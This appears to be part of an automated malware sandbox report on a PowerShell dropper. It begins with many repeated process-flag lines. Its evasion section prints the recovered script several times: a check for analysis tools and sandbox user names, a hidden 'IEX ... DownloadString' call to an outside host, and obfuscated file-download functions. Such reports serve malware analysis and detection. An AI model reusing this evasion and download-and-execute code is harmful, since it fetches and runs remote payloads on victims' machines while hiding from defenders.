Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'\|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: REGMON.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IEXIZBRX:FQPE"QADLOMKLSRBS)YLCYJ6W(LY%VB4@TE.P(*CE2D-KMIU#V:.0#15;{3EZUNMUGWHKG}AMH_F8S7H9NO/W\TJAGX~QJ87403941904002261452406839FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS \| WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'\|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;PN,JP
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS \| WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'\|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: POWERSHELLGET.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'\|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9912			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9921			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9184

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: mshta.exe, 00000002.00000003.56231710859.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249468249.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246926292.00000000031B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246272360.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000002.00000002.56249325888.000000000317A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56233772606.000000000317A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWl
